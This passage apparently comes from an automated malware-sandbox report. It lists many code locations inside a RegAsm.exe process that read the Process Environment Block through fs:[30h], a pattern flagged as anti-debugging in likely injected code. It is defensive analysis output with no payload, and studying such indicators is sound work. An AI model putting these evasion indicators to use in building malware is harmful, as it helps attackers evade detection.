            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02EBF3E6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02ED53FC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E1E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E363FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E0A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02EBC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02EBB3D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_02E333A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E233A5 mov eax, dword ptr fs:[00000030h]7_2_02E233A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF8397 mov eax, dword ptr fs:[00000030h]7_2_02DF8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF8397 mov eax, dword ptr fs:[00000030h]7_2_02DF8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF8397 mov eax, dword ptr fs:[00000030h]7_2_02DF8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFE388 mov eax, dword ptr fs:[00000030h]7_2_02DFE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFE388 mov eax, dword ptr fs:[00000030h]7_2_02DFE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFE388 mov eax, dword ptr fs:[00000030h]7_2_02DFE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2438F mov eax, dword ptr fs:[00000030h]7_2_02E2438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2438F mov eax, dword ptr fs:[00000030h]7_2_02E2438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED539D mov eax, dword ptr fs:[00000030h]7_2_02ED539D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E5739A mov eax, dword ptr fs:[00000030h]7_2_02E5739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E5739A mov eax, dword ptr fs:[00000030h]7_2_02E5739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9353 mov eax, dword ptr fs:[00000030h]7_2_02DF9353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9353 mov eax, dword ptr fs:[00000030h]7_2_02DF9353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBF367 mov eax, dword ptr fs:[00000030h]7_2_02EBF367
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E07370 mov eax, dword ptr fs:[00000030h]7_2_02E07370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E07370 mov eax, dword ptr fs:[00000030h]7_2_02E07370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E07370 mov eax, dword ptr fs:[00000030h]7_2_02E07370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFD34C mov eax, dword ptr fs:[00000030h]7_2_02DFD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFD34C mov eax, dword ptr fs:[00000030h]7_2_02DFD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EA437C mov eax, dword ptr fs:[00000030h]7_2_02EA437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E82349 mov eax, dword ptr fs:[00000030h]7_2_02E82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED5341 mov eax, dword ptr fs:[00000030h]7_2_02ED5341
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8035C mov eax, dword ptr fs:[00000030h]7_2_02E8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8035C mov eax, dword ptr fs:[00000030h]7_2_02E8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8035C mov eax, dword ptr fs:[00000030h]7_2_02E8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8035C mov ecx, dword ptr fs:[00000030h]7_2_02E8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8035C mov eax, dword ptr fs:[00000030h]7_2_02E8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8035C mov eax, dword ptr fs:[00000030h]7_2_02E8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECA352 mov eax, dword ptr fs:[00000030h]7_2_02ECA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC132D mov eax, dword ptr fs:[00000030h]7_2_02EC132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC132D mov eax, dword ptr fs:[00000030h]7_2_02EC132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2F32A mov eax, dword ptr fs:[00000030h]7_2_02E2F32A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFC310 mov ecx, dword ptr fs:[00000030h]7_2_02DFC310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8930B mov eax, dword ptr fs:[00000030h]7_2_02E8930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8930B mov eax, dword ptr fs:[00000030h]7_2_02E8930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8930B mov eax, dword ptr fs:[00000030h]7_2_02E8930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3A30B mov eax, dword ptr fs:[00000030h]7_2_02E3A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3A30B mov eax, dword ptr fs:[00000030h]7_2_02E3A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3A30B mov eax, dword ptr fs:[00000030h]7_2_02E3A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF7330 mov eax, dword ptr fs:[00000030h]7_2_02DF7330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E20310 mov ecx, dword ptr fs:[00000030h]7_2_02E20310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E250E4 mov eax, dword ptr fs:[00000030h]7_2_02E250E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E250E4 mov ecx, dword ptr fs:[00000030h]7_2_02E250E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E080E9 mov eax, dword ptr fs:[00000030h]7_2_02E080E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E420F0 mov ecx, dword ptr fs:[00000030h]7_2_02E420F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov ecx, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov ecx, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov ecx, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov ecx, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C0 mov eax, dword ptr fs:[00000030h]7_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFC0F0 mov eax, dword ptr fs:[00000030h]7_2_02DFC0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED50D9 mov eax, dword ptr fs:[00000030h]7_2_02ED50D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E820DE mov eax, dword ptr fs:[00000030h]7_2_02E820DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E290DB mov eax, dword ptr fs:[00000030h]7_2_02E290DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA0E3 mov ecx, dword ptr fs:[00000030h]7_2_02DFA0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFD08D mov eax, dword ptr fs:[00000030h]7_2_02DFD08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC60B8 mov eax, dword ptr fs:[00000030h]7_2_02EC60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC60B8 mov ecx, dword ptr fs:[00000030h]7_2_02EC60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0208A mov eax, dword ptr fs:[00000030h]7_2_02E0208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2D090 mov eax, dword ptr fs:[00000030h]7_2_02E2D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2D090 mov eax, dword ptr fs:[00000030h]7_2_02E2D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E05096 mov eax, dword ptr fs:[00000030h]7_2_02E05096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3909C mov eax, dword ptr fs:[00000030h]7_2_02E3909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED5060 mov eax, dword ptr fs:[00000030h]7_2_02ED5060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov ecx, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11070 mov eax, dword ptr fs:[00000030h]7_2_02E11070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2C073 mov eax, dword ptr fs:[00000030h]7_2_02E2C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E02050 mov eax, dword ptr fs:[00000030h]7_2_02E02050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B052 mov eax, dword ptr fs:[00000030h]7_2_02E2B052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EA705E mov ebx, dword ptr fs:[00000030h]7_2_02EA705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EA705E mov eax, dword ptr fs:[00000030h]7_2_02EA705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC903E mov eax, dword ptr fs:[00000030h]7_2_02EC903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC903E mov eax, dword ptr fs:[00000030h]7_2_02EC903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC903E mov eax, dword ptr fs:[00000030h]7_2_02EC903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC903E mov eax, dword ptr fs:[00000030h]7_2_02EC903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E016 mov eax, dword ptr fs:[00000030h]7_2_02E1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E016 mov eax, dword ptr fs:[00000030h]7_2_02E1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E016 mov eax, dword ptr fs:[00000030h]7_2_02E1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E016 mov eax, dword ptr fs:[00000030h]7_2_02E1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA020 mov eax, dword ptr fs:[00000030h]7_2_02DFA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFC020 mov eax, dword ptr fs:[00000030h]7_2_02DFC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED61E5 mov eax, dword ptr fs:[00000030h]7_2_02ED61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E051ED mov eax, dword ptr fs:[00000030h]7_2_02E051ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E301F8 mov eax, dword ptr fs:[00000030h]7_2_02E301F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED51CB mov eax, dword ptr fs:[00000030h]7_2_02ED51CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC61C3 mov eax, dword ptr fs:[00000030h]7_2_02EC61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC61C3 mov eax, dword ptr fs:[00000030h]7_2_02EC61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3D1D0 mov eax, dword ptr fs:[00000030h]7_2_02E3D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3D1D0 mov ecx, dword ptr fs:[00000030h]7_2_02E3D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA197 mov eax, dword ptr fs:[00000030h]7_2_02DFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA197 mov eax, dword ptr fs:[00000030h]7_2_02DFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA197 mov eax, dword ptr fs:[00000030h]7_2_02DFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB11A4 mov eax, dword ptr fs:[00000030h]7_2_02EB11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB11A4 mov eax, dword ptr fs:[00000030h]7_2_02EB11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB11A4 mov eax, dword ptr fs:[00000030h]7_2_02EB11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB11A4 mov eax, dword ptr fs:[00000030h]7_2_02EB11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1B1B0 mov eax, dword ptr fs:[00000030h]7_2_02E1B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E40185 mov eax, dword ptr fs:[00000030h]7_2_02E40185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBC188 mov eax, dword ptr fs:[00000030h]7_2_02EBC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBC188 mov eax, dword ptr fs:[00000030h]7_2_02EBC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E57190 mov eax, dword ptr fs:[00000030h]7_2_02E57190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8019F mov eax, dword ptr fs:[00000030h]7_2_02E8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8019F mov eax, dword ptr fs:[00000030h]7_2_02E8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8019F mov eax, dword ptr fs:[00000030h]7_2_02E8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8019F mov eax, dword ptr fs:[00000030h]7_2_02E8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFC156 mov eax, dword ptr fs:[00000030h]7_2_02DFC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E99179 mov eax, dword ptr fs:[00000030h]7_2_02E99179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9148 mov eax, dword ptr fs:[00000030h]7_2_02DF9148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9148 mov eax, dword ptr fs:[00000030h]7_2_02DF9148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9148 mov eax, dword ptr fs:[00000030h]7_2_02DF9148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9148 mov eax, dword ptr fs:[00000030h]7_2_02DF9148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
